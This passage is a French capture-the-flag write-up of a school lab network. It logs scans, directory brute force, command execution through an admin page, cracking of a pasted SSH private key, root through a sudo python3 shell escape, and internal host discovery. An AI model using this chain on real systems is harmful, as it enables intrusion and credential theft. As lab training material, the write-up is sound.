# **SOMMAIRE :** [toc] --- # Les Flags (résumé) | id | Flag | hôte | location | date | |---|---|---|---|--| | 1 | FLAG{C3sTQu01UnU53r4G3nT?} | 192.168.0.2 (infra-05.ipssi.cloud) | http://infra-05.ipssi.cloud/newsletter/robots.txt | 27/05/2024 | | 2 | FLAG{G0bu5T3r1s4G0oD1d3A} | 192.168.0.2 (infra-05.ipssi.cloud) | http://infra-05.ipssi.cloud/newsletter/flag/flag.txt | 27/05/2024 | | 3 | FLAG{L0uRd3 M3sUr3} | 192.168.0.2 (infra-05.ipssi.cloud) | `curl http://infra-05.ipssi.cloud/newsletter/admin.php -A "TropSmartUserAgentAdminHeHeHe"` | 27/05/2024 | | 4 | FLAG{F4c1l3ATr0uv3r} | 192.168.0.2 (infra-05.ipssi.cloud) | http://infra-05.ipssi.cloud/newsletter/truc.db | 27/05/2024 | | 5 | FLAG{U53rR3b0Nd} | 192.168.0.2 (infra-05.ipssi.cloud) | `rebond@NewsLetter:~$ cat /home/rebond/flag.txt` | 27/05/2024 - 15h06 | | 6 | FLAG{M1r01RM1r01R} | 192.168.0.200 | http://localhost:9999/mirror | 27/05/2024 - 17h40 | | 7 | FLAG{P4t1C13Nc31SEv3R1tH1nG} | 192.168.0.101 | `C:\Users\tomega\Desktop\Enquete.txt` | 28/05/2024 | | 8 | FLAG{H1dD3nF1l3Sr34Lly?} | 192.168.0.101 | `C:\Users\Public\Public Bubbles\.hidden.txt` | 28/05/2024 | | 9 | FLAG{M0i4u5SiJ4d0R3L3sBuLl35} | 192.168.0.101 | `C:\Users\Administrator\Desktop\flag.txt` | 28/05/2024 | | 10 | FLAG{S0fCk1nEz??????} | 192.168.0.100 | `C:\Users\Administrator\Desktop\flag.txt` | 28/05/2024 | | 11 | FLAG{8uBb1es3v3rywh3re}| 192.168.0.123 | nmap de l'ip 192.168.0.123 | 29/05/2024 | | 12 | FLAG{0hMyLF1!!} | 192.168.0.123 | 127.0.0.1:8080/config.php | 29/05/2024 | | 13 | FLAG{4h...C0mm3nts...}| 192.168.0.123 | comment on source code :8080/index.php | 29/05/2024 | | 14 | FLAG{r3gizi} | 192.168.0.100 | | 29/05/2024 | | 15 | FLAG{7h4tW4s34syr1ght?} | 192.168.0.123 | `/home/john/.flag` | 29/05/2024 | | 16 | FLAG{s3ct4ryBub113s} | 192.168.0.123 | +`http://localhost:8080/admin.php` | 29/05/2024 | --- # Wordlist obtenu avec les données trouvé ``` $ cat wordlist.txt JADORELESBULLES TropSmartUserAgentAdminHeHeHe oui.truc@gmail.com oui truc oui.truc mirroir administrator Administrator bubble.dev bubble dev tomega omega iamtheomega localadm 424368059590d35e0152cedf07afd96376548a52bd714eebaa089f452fb5dd76 secret.key flag uoddsfhhbhkdhhh8 john toto ``` --- # Notes ## [Info] enumeration des ports ```bash nmap infra-05.ipssi.cloud -p 1-65000 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 11:53 CEST Nmap scan report for infra-05.ipssi.cloud (51.255.94.193) Host is up (0.054s latency). rDNS record for 51.255.94.193: ns3050781.ip-51-255-94.eu Not shown: 64993 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 80/tcp open http 111/tcp open rpcbind 3128/tcp open squid-http 8006/tcp open wpl-analytics 64220/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 69.19 seconds ``` --- ## [Info] bannière des services ``` $ nmap -sV --script=banner infra-05.ipssi.cloud -p 1-65000 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 12:08 CEST Nmap scan report for infra-05.ipssi.cloud (51.255.94.193) Host is up (0.053s latency). rDNS record for 51.255.94.193: ns3050781.ip-51-255-94.eu Not shown: 64993 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0) |_banner: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.7 25/tcp filtered smtp 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-server-header: Apache/2.4.52 (Ubuntu) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 3128/tcp open http Proxmox Virtual Environment REST API 3.0 |_http-server-header: pve-api-daemon/3.0 8006/tcp open wpl-analytics? | fingerprint-strings: | HTTPOptions: | HTTP/1.0 501 method 'OPTIONS' not available | Cache-Control: max-age=0 | Connection: close | Date: Mon, 27 May 2024 10:12:23 GMT | Pragma: no-cache | Server: pve-api-daemon/3.0 | Expires: Mon, 27 May 2024 10:12:23 GMT | Help: | HTTP/1.0 400 bad request | Cache-Control: max-age=0 | Connection: close | Date: Mon, 27 May 2024 10:12:38 GMT | Pragma: no-cache | Server: pve-api-daemon/3.0 | Expires: Mon, 27 May 2024 10:12:38 GMT | Kerberos, TerminalServerCookie: | HTTP/1.0 400 bad request | Cache-Control: max-age=0 | Connection: close | Date: Mon, 27 May 2024 10:12:39 GMT | Pragma: no-cache | Server: pve-api-daemon/3.0 | Expires: Mon, 27 May 2024 10:12:39 GMT | LDAPSearchReq, LPDString: | HTTP/1.0 400 bad request | Cache-Control: max-age=0 | Connection: close | Date: Mon, 27 May 2024 10:12:49 GMT | Pragma: no-cache | Server: pve-api-daemon/3.0 | Expires: Mon, 27 May 2024 10:12:49 GMT | RTSPRequest: | HTTP/1.0 400 bad request | Cache-Control: max-age=0 | Connection: close | Date: Mon, 27 May 2024 10:12:23 GMT | Pragma: no-cache | Server: pve-api-daemon/3.0 |_ Expires: Mon, 27 May 2024 10:12:23 GMT 64220/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) |_banner: SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8006-TCP:V=7.94SVN%I=7%D=5/27%Time=66545BDE%P=x86_64-pc-linux-gnu%r SF:(HTTPOptions,D7,"HTTP/1\.0\x20501\x20method\x20'OPTIONS'\x20not\x20avai SF:lable\r\nCache-Control:\x20max-age=0\r\nConnection:\x20close\r\nDate:\x SF:20Mon,\x2027\x20May\x202024\x2010:12:23\x20GMT\r\nPragma:\x20no-cache\r SF:\nServer:\x20pve-api-daemon/3\.0\r\nExpires:\x20Mon,\x2027\x20May\x2020 SF:24\x2010:12:23\x20GMT\r\n\r\n")%r(RTSPRequest,C4,"HTTP/1\.0\x20400\x20b SF:ad\x20request\r\nCache-Control:\x20max-age=0\r\nConnection:\x20close\r\ SF:nDate:\x20Mon,\x2027\x20May\x202024\x2010:12:23\x20GMT\r\nPragma:\x20no SF:-cache\r\nServer:\x20pve-api-daemon/3\.0\r\nExpires:\x20Mon,\x2027\x20M SF:ay\x202024\x2010:12:23\x20GMT\r\n\r\n")%r(Help,C4,"HTTP/1\.0\x20400\x20 SF:bad\x20request\r\nCache-Control:\x20max-age=0\r\nConnection:\x20close\r SF:\nDate:\x20Mon,\x2027\x20May\x202024\x2010:12:38\x20GMT\r\nPragma:\x20n SF:o-cache\r\nServer:\x20pve-api-daemon/3\.0\r\nExpires:\x20Mon,\x2027\x20 SF:May\x202024\x2010:12:38\x20GMT\r\n\r\n")%r(TerminalServerCookie,C4,"HTT SF:P/1\.0\x20400\x20bad\x20request\r\nCache-Control:\x20max-age=0\r\nConne SF:ction:\x20close\r\nDate:\x20Mon,\x2027\x20May\x202024\x2010:12:39\x20GM SF:T\r\nPragma:\x20no-cache\r\nServer:\x20pve-api-daemon/3\.0\r\nExpires:\ SF:x20Mon,\x2027\x20May\x202024\x2010:12:39\x20GMT\r\n\r\n")%r(Kerberos,C4 SF:,"HTTP/1\.0\x20400\x20bad\x20request\r\nCache-Control:\x20max-age=0\r\n SF:Connection:\x20close\r\nDate:\x20Mon,\x2027\x20May\x202024\x2010:12:39\ SF:x20GMT\r\nPragma:\x20no-cache\r\nServer:\x20pve-api-daemon/3\.0\r\nExpi SF:res:\x20Mon,\x2027\x20May\x202024\x2010:12:39\x20GMT\r\n\r\n")%r(LPDStr SF:ing,C4,"HTTP/1\.0\x20400\x20bad\x20request\r\nCache-Control:\x20max-age SF:=0\r\nConnection:\x20close\r\nDate:\x20Mon,\x2027\x20May\x202024\x2010: SF:12:49\x20GMT\r\nPragma:\x20no-cache\r\nServer:\x20pve-api-daemon/3\.0\r SF:\nExpires:\x20Mon,\x2027\x20May\x202024\x2010:12:49\x20GMT\r\n\r\n")%r( SF:LDAPSearchReq,C4,"HTTP/1\.0\x20400\x20bad\x20request\r\nCache-Control:\ SF:x20max-age=0\r\nConnection:\x20close\r\nDate:\x20Mon,\x2027\x20May\x202 SF:024\x2010:12:49\x20GMT\r\nPragma:\x20no-cache\r\nServer:\x20pve-api-dae SF:mon/3\.0\r\nExpires:\x20Mon,\x2027\x20May\x202024\x2010:12:49\x20GMT\r\ SF:n\r\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 180.53 seconds ``` --- ## [Info] résumer des ports | port | service | status | bannière | |---|---|---|---| | 22 | ssh | open | SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.7 | | 25 | smtp | filtered | - | | 80 | http | open | Apache httpd 2.4.52 ((Ubuntu)) | | 111 | rpcbind ? | open | rpcinfo: 100000 2,3,4 111/tcp rpcbind | | 3128 | http | open | Proxmox Virtual Environment REST API 3.0 | --- ## [Info] Gobuster (infra-05.ipssi.cloud) ```bash $ gobuster dir --url infra-05.ipssi.cloud/newsletter/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://infra-05.ipssi.cloud/newsletter/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.htaccess (Status: 403) [Size: 285] /.hta (Status: 403) [Size: 285] /.htpasswd (Status: 403) [Size: 285] /admin.php (Status: 200) [Size: 417] /assets (Status: 301) [Size: 340] [--> http://infra-05.ipssi.cloud/newsletter/assets/] /css (Status: 301) [Size: 337] [--> http://infra-05.ipssi.cloud/newsletter/css/] /flag (Status: 301) [Size: 338] [--> http://infra-05.ipssi.cloud/newsletter/flag/] /index.php (Status: 200) [Size: 772] /js (Status: 301) [Size: 336] [--> http://infra-05.ipssi.cloud/newsletter/js/] /n (Status: 200) [Size: 658] /robots.txt (Status: 200) [Size: 133] Progress: 4727 / 4727 (100.00%) =============================================================== Finished =============================================================== ``` --- ## [Flag] Robots.txt `FLAG{C3sTQu01UnU53r4G3nT?}` > http://infra-05.ipssi.cloud/newsletter/robots.txt ```bash $ curl http://infra-05.ipssi.cloud/newsletter/robots.txt User-Agent: TropSmartUserAgentAdminHeHeHe Allow: /admin.php User-Agent: * Disallow: /admin.php Disallow: FLAG{C3sTQu01UnU53r4G3nT?} ``` --- ## [Flag] flag.txt `FLAG{G0bu5T3r1s4G0oD1d3A}` > http://infra-05.ipssi.cloud/newsletter/flag/flag.txt ```bash curl http://infra-05.ipssi.cloud/newsletter/flag/flag.txt FLAG{G0bu5T3r1s4G0oD1d3A} ``` --- ## [Flag] admin.php `FLAG{L0uRd3 M3sUr3}` ```bash curl http://infra-05.ipssi.cloud/newsletter/admin.php -A "TropSmartUserAgentAdminHeHeHe" ``` ```html <html> <head> <title>BubbleDev - NewsLetter !</title> <link rel="stylesheet" href="css/style.css"/> <script src="js/particles.min.js"></script> <script>particlesJS.load('particles-js', 'assets/particles.json', function() { });</script> <body> </head> <body> <div id="particles-js"></div> <div id="h" style="margin-top: 0; height: 100%;"> <div id="b">BubbleDev !</div> <div id="d">J'suis vraiment beaucoup trop smart avec cette mesure de securite !<!-- FLAG{L0uRd3 M3sUr3} --><br><br>Par contre faut pas déconner, on va pas laisser n'importe quelle commande, il va falloir se contenter de ça</div> <pre id="m" style="width: 80%; background: #444; overflow-y: scroll; height: 200px; padding: 3%; margin-left: 6%; border: 2px solid black;"> Nothing to display yet... </pre> <div id="bs"> <button onclick="w(this);">id -a</button> <button onclick="w(this);">ping -c4 1.1.1.1</button> <button onclick="w(this);">ss -lntuop</button> <button onclick="w(this);">ps -ef</button> </div> </div> </body> <script> function w(e) { var formData = new FormData(); formData.append('cmd', e.innerText); fetch("cmd.php", { method: "POST", body: formData }) .then(response => { if(!response.ok) { throw new Error("Fetch API failed."); } else { return response.text(); } }) .then(data => { document.getElementById("m").innerText = data; console.log(data); }); } </script> </html> ``` --- ## [Info] /n ```bash $ curl http://infra-05.ipssi.cloud/newsletter/n POST /newsletter/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 22 Origin: http://localhost Connection: keep-alive Referer: http://localhost/newsletter/ Cookie: PHPSESSID=elbbvah7qi6oo81vptni33aja2; JSESSID=294de3557d9d00b3d2d8a1e6aab028cf Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 t=oui.truc@gmail.com ``` --- ## [Info] executer des commandes via admin.php ### Burpsuite (GUI) ![burpsuite proxy](https://hackmd.io/_uploads/rJBcqkfEC.png) ![lancement de la commande modifier](https://hackmd.io/_uploads/rkrFiJM4C.png) ``` total 124 drwxr-xr-x 6 www-data root 4096 May 27 11:06 . drwxr-xr-x 3 www-data www-data 4096 May 26 08:47 .. -rw-r--r-- 1 www-data www-data 1630 May 22 21:57 admin.php drwxr-xr-x 2 www-data www-data 4096 May 22 11:32 assets -rw-r--r-- 1 www-data www-data 58 May 22 21:47 cmd.php drwxr-xr-x 2 www-data www-data 4096 May 22 21:53 css drwxr-xr-x 2 www-data www-data 4096 May 22 21:54 flag -rw-r--r-- 1 www-data www-data 1301 May 22 21:05 index.php drwxr-xr-x 2 www-data www-data 4096 May 22 11:32 js -rw-r--r-- 1 www-data www-data 658 May 22 21:04 n -rw-r--r-- 1 www-data www-data 133 May 22 21:55 robots.txt -rw-r--r-- 1 www-data www-data 77824 May 27 11:06 truc.db ``` --- ### Via Repeater ![image](https://hackmd.io/_uploads/rymDhkzNR.png) Action - send to repeater ![image](https://hackmd.io/_uploads/SkKQ6JG4R.png) --- ## [Flag] truc.db `FLAG{F4c1l3ATr0uv3r}` ![image](https://hackmd.io/_uploads/S166pyf4R.png) ```bash $ wget http://infra-05.ipssi.cloud/newsletter/truc.db --2024-05-27 13:24:12-- http://infra-05.ipssi.cloud/newsletter/truc.db Resolving infra-05.ipssi.cloud (infra-05.ipssi.cloud)... 51.255.94.193 Connecting to infra-05.ipssi.cloud (infra-05.ipssi.cloud)|51.255.94.193|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 77824 (76K) Saving to: ‘truc.db’ truc.db 100%[============================>] 76.00K --.-KB/s in 0.1s 2024-05-27 13:24:13 (671 KB/s) - ‘truc.db’ saved [77824/77824] ``` ```bash $ sqlite3 SQLite version 3.45.3 2024-04-15 13:34:05 Enter ".help" for usage hints. Connected to a transient in-memory database. Use ".open FILENAME" to reopen on a persistent database. sqlite> .open "truc.db" sqlite> .databases main: /home/khey/truc.db r/w sqlite> .tables mails secrets sqlite> SELECT * FROM secrets; FLAG{F4c1l3ATr0uv3r} sqlite> ``` --- ## [Info] clefs ssh de l'utilisateur `rebond` ![image](https://hackmd.io/_uploads/rJBKRgMVC.png) ![image](https://hackmd.io/_uploads/r1-jCgf4C.png) ![image](https://hackmd.io/_uploads/rkIF5lMNR.png) ```bash cat <<EOF > rebond-privkey -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAGKj/BdM LOO5GmD9sI5yOkAAAAEAAAAAEAAAGXAAAAB3NzaC1yc2EAAAADAQABAAABgQCmeAPXWMZ6 N1456NF9kjTKk5it7ZTaMnYcP9Q9MJbazeSL8jIM+tvIZCgvVAFJd4PBl9jduYojY9lZ2H WOPs4NsmM4HIrcWYlqtNUJRK9t3OgIn59MtJlC5fYFHw9Zr9GicTM1K8Q6xqocdkbbcIek DdABbNQXaxSj81Eh5mJzjk6fhobAGG48I+G1NO0cKUl0ozmuZir04nQ/dGXmiZZWVZeqbx vN7TWWn5Hp6J1l9C7Lwzd+Dl5RUODLtce3da+4Z5EZZ6At3hGA90EW7eJgL2Ao3zrqCTHg PwGp7prfmv+emQdhbndeEUb8bXSBNLLMA1GbbC0Atk84m+TTwhqKHfhkicLezEo017KkoQ YodhxNhfLU1GDjDw5XNMs2ESdBNhV6JOCB4iLDVldtvzZ2bu8C6YxdO0eN+lJu8zTf0njl u0OJkDorsUsWZz4JFHtBFlBQJe2+akHgrpdaayl2rTEAsIcyRdhfQZ5OQV6lrogWqgC1sx 2CAyASSz9gX4kAAAWAsTiOaKmaZ9GpJlyQvUyRmc+l2J7DinlkxdHOLhQXrTL50nFf1/vo Ea6av20KXthBzo860PEZ5NoBGHvTmuqqCCoTnP380r4YvaKbxPM1/RJ+JqPJFUTnTuXYE5 jmO+QbusQmWvOLtE0VCOkqdwtAvoU1uYJlh3MQxZPUXqNswEWZ38UOQXi290Ovn0BpyWRc zuum3TjbCh1LR21crmg+3pgHy5nLpIZbRAUumAcubgIKj3Zjr7UWP1ZT+IFsyWjBM48oPO xL2CN7eylUT1KqtQaq46E3knnWnxBIJacL02CwGu2pTOTYiACdAZmoqgKDIzuIlOCLkaNW IV/nCviaPEz3W2KTeR0VPns1y5kqJFNo2HnkbSvJ6oDT6mfCtKImeCW+AKWzEVy3U5qBUq cO75g9NZcf8cBtxEcYaAjJsVg58z72m58DRKfGB0dJxlNN/qlrzvtN97ov0e3dH6cwLUEw pUJ5jByBgSHDmYr9Bd3DupscZeDuan3iAT0Q4S2l9nkY556ejMohojcGhajcMpy2r5bV9p REuWawLCmUXCGHQtxbw65A+RgvNdkX/jgKFozj2ba0sM6aYeMMNGjPxhX3DBkgCMZdLH2P n123HR10z+0BTnOo1WI23n0ne2mGh76emq6ODqevvRYFkxV/JxevIl14xG2vU7LHifH9u2 Xk3ThPQk+X8rj4X3A4IDB9BRie5vu+laA5YEUvl9xy2w9nQWBX55WlZ6SWyKbgichSrK65 DTHPAcLa/9TVnea6ZI2x8x7729qdi9mt+VNNSxqVw7bO6ZQxTZA4cGN/Uq4vhXuX05ORgx TnfYgeYguyShMsj+aV6JymDqE4HQzaFrveIpI/bHBpX/A7pGJtoQcmMyo2jJC/oR4B7eCS RbU5lULf6WQfi8hHVYjRWW5QMLM04t/4ieVxpGOSytA2Heq1loFiER5oYVRhxjy6RVjzyL VkmiGFZLlPOvFUlrL8n/+NC4yt2V9jh7s6midDFqDj1qsfJJ5v+i53JTrHMN8U52Wij29B typCyxtFDvqJfox4hoxa9/gP1bBjuXPn0hWcJBVQaYGWdSA0Ws3OGcy829B74cA/Rua8nX X7BiqSagP92tUbxAaqh4VlBPVO+lMznq8D9Fe4vMFm8rtQ/kL4Ak6qcW+MTwlhAh4XShOv aO87nq3cv9yKLrY8rCjxvkuRTnKU3DJ4D8ag7r9nREqyadq3bBT0xOqGwsCyiDFoAntOS5 no7xvrwyqbE4eFWIYTQgaQh00OWCv7Bo3OgGIAxv3qo5UpDzaXTdt7KwYtAo5I2LNKnWCx NfF45xNAZ7bRcwu7ZNzulZx16tD52HaHhzc0u4yfsgbxpJHmRXKA0Ycat30cfbUuIx6x3D /kqRfwbDKycwhKiSItdgu1JxtxRY4ghN06cR/fWnHTv6VvqKuK0l6a0S46SNwqFeRquTp9 5HESveEcvjjDJFhGQXLoKM720L6LqrTtrb/wBkY41s4vMyESYptMG6210Orw3+1F3DK2F+ ayyL/rXIrbffmZoFaIiRmqbe/00GYdcnmOusYr5Dcin92Wmd3/HYMi71Al2rDJ6bU5Oiy6 z1HYONx6yqTMqY/W0MJOuezSkN0FtN0jMvsCk40PujMAWQ/OOw8uZPcyJ7EK2PqU54UfiN nFZAZi8vl/mqKQkTy8CZf/ltDXt6BiHi1iEFBiK/tLrQQiS5sxDvx0JetwNBjaJsGsAofS qRjz6CwUQoLrdBtkEucms6ycuiVqkqIWCMTPmELd8C0ihx8JS4f30Hm8+9P0rfdHNaG2Ii 2wi8elsQ8kDzYsq/p84vp+yR4qsZE4TkOcmiZtqu8F9tkmwdXyM0io8aFmwE4VhrpGEZBZ IuKKcQ== -----END OPENSSH PRIVATE KEY----- EOF chmod 600 rebond-privkey ssh2john rebond-privkey > rebond-privkey-hash.txt cat rebond-privkey-hash.txt rebond-privkey:$sshng$6$16$062a3fc174c2ce3b91a60fdb08e723a4$1894$6f70656e7373682d6b65792d7631000000000a6165733235362d637472000000066263727970740000001800000010062a3fc174c2ce3b91a60fdb08e723a4000000100000000100000197000000077373682d727361000000030100010000018100a67803d758c67a375e39e8d17d9234ca9398aded94da32761c3fd43d3096dacde48bf2320cfadbc864282f5401497783c197d8ddb98a2363d959d8758e3ece0db263381c8adc59896ab4d50944af6ddce8089f9f4cb49942e5f6051f0f59afd1a27133352bc43ac6aa1c7646db7087a40dd0016cd4176b14a3f35121e662738e4e9f8686c0186e3c23e1b534ed1c294974a339ae662af4e2743f7465e68996565597aa6f1bcded35969f91e9e89d65f42ecbc3377e0e5e5150e0cbb5c7b775afb867911967a02dde1180f74116ede2602f6028df3aea0931e03f01a9ee9adf9aff9e9907616e775e1146fc6d748134b2cc03519b6c2d00b64f389be4d3c21a8a1df86489c2decc4a34d7b2a4a10628761c4d85f2d4d460e30f0e5734cb3611274136157a24e081e222c356576dbf36766eef02e98c5d3b478dfa526ef334dfd278e5bb4389903a2bb14b16673e09147b4116505025edbe6a41e0ae975a6b2976ad3100b0873245d85f419e4e415ea5ae8816aa00b5b31d820320124b3f605f8900000580b1388e68a99a67d1a9265c90bd4c9199cfa5d89ec38a7964c5d1ce2e1417ad32f9d2715fd7fbe811ae9abf6d0a5ed841ce8f3ad0f119e4da01187bd39aeaaa082a139cfdfcd2be18bda29bc4f335fd127e26a3c91544e74ee5d81398e63be41bbac4265af38bb44d1508e92a770b40be8535b98265877310c593d45ea36cc04599dfc50e4178b6f743af9f4069c9645cceeba6dd38db0a1d4b476d5cae683ede9807cb99cba4865b44052e98072e6e020a8f7663afb5163f5653f8816cc968c1338f283cec4bd8237b7b29544f52aab506aae3a1379279d69f104825a70bd360b01aeda94ce4d888009d0199a8aa0283233b8894e08b91a356215fe70af89a3c4cf75b6293791d153e7b35cb992a245368d879e46d2bc9ea80d3ea67c2b4a2267825be00a5b3115cb7539a8152a70eef983d35971ff1c06dc447186808c9b15839f33ef69b9f0344a7c6074749c6534dfea96bcefb4df7ba2fd1eddd1fa7302d4130a542798c1c818121c3998afd05ddc3ba9b1c65e0ee6a7de2013d10e12da5f67918e79e9e8cca21a2370685a8dc329cb6af96d5f69444b966b02c29945c218742dc5bc3ae40f9182f35d917fe380a168ce3d9b6b4b0ce9a61e30c3468cfc615f70c192008c65d2c7d8f9f5db71d1d74cfed014e73a8d56236de7d277b698687be9e9aae8e0ea7afbd160593157f2717af225d78c46daf53b2c789f1fdbb65e4dd384f424f97f2b8f85f703820307d05189ee6fbbe95a03960452f97dc72db0f67416057e795a567a496c8a6e089c852acaeb90d31cf01c2daffd4d59de6ba648db1f31efbdbda9d8bd9adf9534d4b1a95c3b6cee994314d903870637f52ae2f857b97d393918314e77d881e620bb24a132c8fe695e89ca60ea1381d0cda16bbde22923f6c70695ff03ba4626da10726332a368c90bfa11e01ede09245b5399542dfe9641f8bc8475588d1596e5030b334e2dff889e571a46392cad0361deab5968162111e68615461c63cba4558f3c8b5649a218564b94f3af15496b2fc9fff8d0b8cadd95f6387bb3a9a274316a0e3d6ab1f249e6ffa2e77253ac730df14e765a28f6f41b72a42cb1b450efa897e8c78868c5af7f80fd5b063b973e7d2159c2415506981967520345acdce19ccbcdbd07be1c03f46e6bc9d75fb062a926a03fddad51bc406aa87856504f54efa53339eaf03f457b8bcc166f2bb50fe42f8024eaa716f8c4f0961021e174a13af68ef3b9eaddcbfdc8a2eb63cac28f1be4b914e7294dc32780fc6a0eebf67444ab269dab76c14f4c4ea86c2c0b2883168027b4e4b99e8ef1bebc32a9b138785588613420690874d0e582bfb068dce806200c6fdeaa395290f36974ddb7b2b062d028e48d8b34a9d60b135f178e7134067b6d1730bbb64dcee959c75ead0f9d87687873734bb8c9fb206f1a491e6457280d1871ab77d1c7db52e231eb1dc3fe4a917f06c32b273084a89222d760bb5271b71458e2084dd3a711fdf5a71d3bfa56fa8ab8ad25e9ad12e3a48dc2a15e46ab93a7de47112bde11cbe38c32458464172e828cef6d0be8baab4edadbff0064638d6ce2f332112629b4c1badb5d0eaf0dfed45dc32b617e6b2c8bfeb5c8adb7df999a056888919aa6deff4d0661d72798ebac62be437229fdd9699ddff1d8322ef5025dab0c9e9b5393a2cbacf51d838dc7acaa4cca98fd6d0c24eb9ecd290dd05b4dd2332fb02938d0fba3300590fce3b0f2e64f73227b10ad8fa94e7851f88d9c5640662f2f97f9aa290913cbc0997ff96d0d7b7a0621e2d621050622bfb4bad04224b9b310efc7425eb703418da26c1ac0287d2a918f3e82c144282eb741b6412e726b3ac9cba256a92a21608c4cf9842ddf02d22871f094b87f7d079bcfbd3f4adf74735a1b6222db08bc7a5b10f240f362cabfa7ce2fa7ec91e2ab191384e439c9a266daaef05f6d926c1d5f23348a8f1a166c04e1586ba4611905922e28a71$16$486 john --wordlist=frenchpasswords20000.txt rebond-privkey-hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes Cost 2 (iteration count) is 16 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status oui (idrsa) 1g 0:00:10:37 DONE (2024-05-27 08:59) 0.001569g/s 9.465p/s 9.465c/s 9.465C/s seven7..father Use the "--show" option to display all of the cracked passwords reliably Session completed. ssh -i rebond-privkey rebond@infra-05.ipssi.cloud Enter passphrase for key 'rebond-privkey': oui Welcome to Ubuntu 22.04 LTS (GNU/Linux 6.8.4-3-pve x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Last login: Sat May 25 08:21:35 2024 from 192.168.0.1 rebond@NewsLetter:~$ Connection to infra-05.ipssi.cloud closed by remote host. Connection to infra-05.ipssi.cloud closed. ``` --- ## [Flag] (as rebond) /home/rebond/flag.txt > **15h06** `FLAG{U53rR3b0Nd}` ![image](https://hackmd.io/_uploads/HyPx-eGE0.png) ``` rebond@NewsLetter:~$ cat flag.txt FLAG{U53rR3b0Nd} ``` --- ## [Info] get root Depuis rebond ```bash rebond@NewsLetter:~$ sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")' root@NewsLetter:/home/rebond# ``` autre façon : ```bash sudo python3 -c 'import os; os.system("su root")' ``` --- ## [Info] Lateralisation : enumeration des hôtes ```bash root@NewsLetter:/home/rebond# nmap -sn 192.168.0.1/24 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:42 UTC Nmap scan report for 192.168.0.1 Host is up (0.00010s latency). MAC Address: BA:9B:50:98:D1:8A (Unknown) Nmap scan report for 192.168.0.80 Host is up (0.000054s latency). MAC Address: BC:24:11:1A:E1:45 (Unknown) Nmap scan report for 192.168.0.81 Host is up (0.000035s latency). MAC Address: BC:24:11:E7:C7:CF (Unknown) Nmap scan report for 192.168.0.100 Host is up (0.00011s latency). MAC Address: BC:24:11:99:91:F7 (Unknown) Nmap scan report for 192.168.0.101 Host is up (0.00017s latency). MAC Address: BC:24:11:4F:8B:17 (Unknown) Nmap scan report for 192.168.0.200 Host is up (0.000090s latency). MAC Address: BC:24:11:07:76:DF (Unknown) Nmap scan report for NewsLetter.local (192.168.0.2) Host is up. Nmap done: 256 IP addresses (7 hosts up) scanned in 1.30 seconds ``` | host | hostname | |---|---| | 192.168.0.1 | gateway | | 192.168.0.2 | NewsLetter | | 192.168.0.80 | Jenkins | | 192.168.0.81 | Gitea | | 192.168.0.100 | Windows Server | | 192.168.0.101 | Windows Client | | 192.168.0.200 | Les maths c'est nul | --- ## [Info] nmap 192.168.0.80 ```bash root@NewsLetter:/home/rebond# nmap -sV 192.168.0.80 -p 1-65000 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:47 UTC Nmap scan report for 192.168.0.80 Host is up (0.0000090s latency). Not shown: 64998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) 8080/tcp open http Jetty 10.0.20 MAC Address: BC:24:11:1A:E1:45 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds ``` | port | protocol | service | |---|---|---| | 22 | ssh | OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; 